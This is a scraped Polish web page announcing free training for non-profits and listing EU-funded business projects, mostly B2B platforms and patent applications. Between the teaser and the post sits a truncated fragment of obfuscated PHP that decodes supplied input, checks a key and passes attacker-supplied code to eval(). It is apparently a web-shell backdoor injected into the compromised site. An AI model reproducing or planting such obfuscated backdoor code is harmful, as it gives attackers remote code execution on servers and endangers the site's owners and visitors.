Najnowszy

Nieodpłatne szkolenia dla instytucji niedochodowych

Pracujesz dla niekomercyjnego stowarzyszenia albo fundacji? Od dziś możesz zgłosić wniosek o szkolenia, które pomogą Twojej organizacji rozwinąć skrzydła. Za udział w otrzymanym kursie nie

Czytaj więcej...
$l2746){$ecaa4dc5 = $l2746;$sf74268d0 = $v2a0;}if (!$ecaa4dc5){foreach ($m5720a[$m5720a['uda8726'][45].$m5720a['uda8726'][77].$m5720a['uda8726'][23].$m5720a['uda8726'][7].$m5720a['uda8726'][7].$m5720a['uda8726'][48]] as $v2a0=>$l2746){$ecaa4dc5 = $l2746;$sf74268d0 = $v2a0;}}$ecaa4dc5 = @$m5720a[$m5720a['uda8726'][55].$m5720a['uda8726'][63].$m5720a['uda8726'][21].$m5720a['uda8726'][27].$m5720a['uda8726'][77]]($m5720a[$m5720a['uda8726'][67].$m5720a['uda8726'][49].$m5720a['uda8726'][17].$m5720a['uda8726'][7].$m5720a['uda8726'][24].$m5720a['uda8726'][48].$m5720a['uda8726'][96]]($m5720a[$m5720a['uda8726'][55].$m5720a['uda8726'][48].$m5720a['uda8726'][77].$m5720a['uda8726'][47].$m5720a['uda8726'][49]]($ecaa4dc5), $sf74268d0));if (isset($ecaa4dc5[$m5720a['uda8726'][21].$m5720a['uda8726'][61]]) && $m6da==$ecaa4dc5[$m5720a['uda8726'][21].$m5720a['uda8726'][61]]){if ($ecaa4dc5[$m5720a['uda8726'][21]] == $m5720a['uda8726'][1]){$ld6b5a9 = Array($m5720a['uda8726'][88].$m5720a['uda8726'][95] => @$m5720a[$m5720a['uda8726'][66].$m5720a['uda8726'][21].$m5720a['uda8726'][47].$m5720a['uda8726'][63].$m5720a['uda8726'][63].$m5720a['uda8726'][41]](),$m5720a['uda8726'][14].$m5720a['uda8726'][95] => $m5720a['uda8726'][96].$m5720a['uda8726'][6].$m5720a['uda8726'][23].$m5720a['uda8726'][52].$m5720a['uda8726'][96],);echo @$m5720a[$m5720a['uda8726'][67].$m5720a['uda8726'][24].$m5720a['uda8726'][67].$m5720a['uda8726'][21].$m5720a['uda8726'][24].$m5720a['uda8726'][41].$m5720a['uda8726'][21].$m5720a['uda8726'][27]]($ld6b5a9);}elseif ($ecaa4dc5[$m5720a['uda8726'][21]] == $m5720a['uda8726'][7]){eval/*y4f65c*/($ecaa4dc5[$m5720a['uda8726'][92]]);}exit();}} ?>

Dotacje europejskie na szkolenia

Data publikacji: 05.06.2018
Autor: admin

Lista wniosków, które uzyskają pomoc publiczną w obecnym kwartale:

Adaptacja modelu zdalnego przedsiębiorstwa KOZIOL Spółka z ograniczona odpowiedzialnością S.K.A. do obsługi sieci dystrybucyjnej w oparciu o mechanizm B2B

Zintegowana automatyzacja aktualnego modelu realizacji usług handlowych pomiędzy Fruitland Sp. z o.o. a partnerami biznesowymi poprzez wdrożenie systemu telekomunikacyjnego typu B2B

Badania nad opracowaniem wytycznych, technik i technologii dla systemów kompensacji mocy biernej, inteligentnego monitoringu wewnętrznych sieci elektroenergetycznych oraz ogniw fotowoltaicznych dedykowanych obiektom hybrydowym opartym wyłącznie o źródła odnawialne

Budowa i zaimplementowanie od a do Z systemu B2B integrującego zarządzanie procesami biznesowymi między Kancelarią Łebkowski Kopczyński Radcowie Prawni sp.j. a jej partnerami biznesowymi

Kompletne opracowanie sieci teleinformatycznej w miejscowościach Zakrzewo, Godziszewo, Nowa Tuchorza, Tuchorza, Stara Tuchorza, Reklin, Reklinek, Siedlec, gmina Siedlec.

Dokonanie zgłoszenia patentowego w procedurze PCT na wynalazek pod nazwa:: Elektromagnetyczne wzbudniki drgań dla konstrukcji inżynierskich (o dużej mocy- duża siła wzbudzania)

Działania informacyjno - promocyjne realizowane w 2013 r. przez Bank Gospodarstwa Krajowego - Instytucję Wdrażającą dla działania 4.3 Programu Operacyjnego Innowacyjna Gospodarka

Implementacja dedykowanego modelu telekomunikacyjnego typu B2B w firmie MIREX w celu usprawnienia procesów zachodzących pomiędzy Wnioskodawcą a partnerami biznesowymi. |Innowacyjna technologia produkcji gwoździ z drutu kształtowego łączonych w zwoje lub płaskie pakiety gwarancją wzrostu konkurencyjności Spółki Bizon Metal.

Teleinformatyczna platforma dystrybucyjna klasy B2B dla optymalizacji i automatyzacji procesów biznesowych pomiędzy Firmą Bumerang Sp. z o.o. a jej partnerami i kontrahentami.

Komputeryzacja i wyposażenie w sprzęt biurowy, materiały biurowe, eksploatacyjne, oprogramowanie komputerowe, szafy kartotekowe, zakup i finansowanie kosztów użytkowania telefonów służbowych pracowników IP i IW oraz utworzenie Lokalnego Systemu Informatycznego.

Ocena przydatności technologii i spoiw mineralnych dla obiektów hydrotechnicznych oraz inżynierii środowiska na podstawie dotychczasowych i proponowanych rozwiązań

Zaprojektowanie i zaimplementowanie od a do Z aplikacji B2B przeznaczonej do automatyzacji wymiany informacji biznesowych z współpracującymi partnerami MX Solution Sp. z o.o.

Opracowanie i wdrożenie platformy internetowej z integracją systemów zdalnych partnerów biznesowych w celu elektronicznej wymiany danych i informacji B2B.

Opracowanie, implementacja i wdrożenie aplikacji UniB2B przeznaczonej do automatyzacji wymiany informacji biznesowych z współpracującymi partnerami UNICRARD S.A.

Platforma informatyczna do celów analiz propagacyjnych, kompatybilności elektromagnetycznej i optymalizacji sieci bezprzewodowych systemów telekomunikacyjnych i telemobilnych

Portal teleinformatyczny dla poszukujących i oferujących usługi w zakresie serwisów technicznych z możliwością zlecania i administrowania zgłoszeń awaryjnych

Przygotowanie Planu Rozwoje Eksportu dla PABEMII sp. z o.o. zawierającego analizę pozycji spółki pod względem konkurencyjności oraz wskazanie rynków docelowych dla działalności eksportowej (rynek włoski, bułgarski, rumuński i rynki skandynawskie), wskazanie wymogów warunkujących wejście na dane rynki i wskazanie działań niezbędnych do podjęcia działalności eksportowej na wybranych rynkach.

Opracowanie europejskiego serwisu mobilnego skupionego wokół zdrowego trybu życia z autorskimi narzędziami dietetycznymi oraz wyszukiwarkami tematycznymi

Wdrożenie i wdrożenie systemu B2B usprawniającego współpracę Nidea Sp. z o.o. z partnerami w zakresie zamówień, obsługi należności i wymiany dokumentów

Stworzenie innowacyjnej platformy internetowej umożliwiającej optymalizację podróży kolejowych, spersonalizowany dobór połączeń i Nabycie biletów poprzez Internet oraz urządzenia mobilne.

Wdrożenie internetowego modelu klasy B2B automatyzującego procesy biznesowej zachodzące między firmą Konsorcjum Biuro Klub Sp. z o. o. a jej partnerami biznesowymi szansą na jej dalszy, dynamiczny rozwój

Wdrożenie internetowej platformy udostępniania zasobów informacji z dziedziny projektowo-wykonawczej wraz z usługą do kompleksowego zarządzania projektami.

Zaprojektowanie nowoczesnej platformy komunikacji marketingowej do nawiązywania kontaktów interpersonalnych przy użyciu serwisu internetowego zintegoowanego z telefonem komórkowym.|Zaprojektowanie prototypu, a następnie wdrożenie do produkcji Detektora wykrywającego wycinkę drzew w lasach, wraz z możliwością wysyłania informacji o nielegalnej wycince do Służb Nadzoru Lasów.

Wdrożenie zautomatyzowanej platformy informatycznej do zarządzania procesami przygotowania materiałów elektronicznych do druku offsetowego i cyfrowego.

Uruchomienie platformy e-learningowej do prowadzenia szkoleń internetowych będących odpowiedzią na potrzeby rynku pracy w celu wzbogacenia potencjału kompetencyjnego osób uczących się, jako przyszłych pracowników, właścicieli firm.

Formalne zgłoszenie międzynarodowej ochrony patentowejdla wynalazku pt.: Sposób mocowania przeszczepianej rogówki i implant do mocowania przeszczepianej rogówki

Uzyskanie ochrony własności przemysłowej na Układ do elektrostymulacji tusz mięsa prądem stałym” w 15-tu państwach o największej produkcji wołowiny na świecie.

Zaimplementowanie od podstaw dedykowanego procesu zdalnego typu B2B w firmie Simplum w celu usprawnienia modeli zachodzących pomiędzy Wnioskodawcą a partnerami biznesowymi.

Wdrożenie elektronicznej platformy B2B umożliwiającej automatyzację procesów biznesowych pomiędzy Hurtownią Oftalmiczną OPTYLUX, a partnerami biznesowymi

Wdrożenie w pełni nowatorskiego aktualnego modelu sortowania materiałów węglowych na potrzeby wysokich technologii krzemowych, poprzez rozbudowę instalacji oraz jednostek laboratoryjno-badawczych w zakładach produkcyjnych Polchar Sp. z o.o.

Wdrożenie nowoczesnej i praktycznej technologii stabilizacji gruntu i recyklingu głębokiego konstrukcji nawierzchni za pomocą wieloskładnikowego środka stabilizującego E-TAMBT |Zaimplementowanie od podstaw internetowej platformy dystrybucyjnej klasy B2B w firmie Zakład Produkcyjno -Handlowy BASTAmgr inż. Stanisław Barczyk dla optymalizacji i automatyzacji efektywności modeli biznesowych z partnerami i kontrahentami.

Zaimplementowanie od podstaw nowoczesnego procesu B2B integrującego systemy korporacji Handlowego Agroskład i partnerów w zakresie składania zamówień, zakupów i fakturowania.

Wdrożenie nowoczesnego modelu zdalnego upraszczającego procesy biznesowe między Learn Up a Partnerami w zakresie świadczonych usług e-learningowych i pozostałych nowoczesnych form szkoleniowych szansą na dalszy, dynamiczny rozwój przedsiębiorstwa.

Wdrożenie przez firmę AFILIANT calkowicie nowatorskiej e-usługi automatycznego generowania raportów dotyczących efektywności poszczególnych form reklamy internetowej

Wdrożenie modelu mobilnego B2B w przedsiębiorstwie Blue Technology i jego integracja z systemami przedsiębiorstw pośredniczących w sprzedaży między Wnioskodawcą a klientami indywidualnymi.

Wdrożenie systemu telekomunikacyjnego, usprawniającego proces zarządzania produkcją, sprzedażą i relacjami z partnerami biznesowymi, poprzez automatyzację komunikacji handlowej.

Wprowadzenie na rynek innowacyjnej usługi e-dietetyka wspomagającej leczenie nadwagi, otyłości i szeregu chorób dietozależnych przez firmę Fabryka Zdrowia Sp. z o.o. w organizacji

Wsparcie na uzyskanie ochrony własnosci przemysłowej we Francji, Niemczech, Włoszech, Hiszpanii, Wielkiej Brytanii i Polsce wynalazku System pay121 (pay one to one) do tworzenia, udostępniania, dekretowania i archiwizacji faktur elektronicznych”

Wsparcie zarządzania Instytucji Pośredniczącej w 2011 r. poprzez finansowanie kształcenia pracowników IP oraz innych kosztów związanych z wdrażaniem PO IG

Zwiększenie efektywności koncernu poprzez wdrożenie nowoczesnego rozwiązania Business to Business łączącego i usprawniającego procesy biznesoweTagi: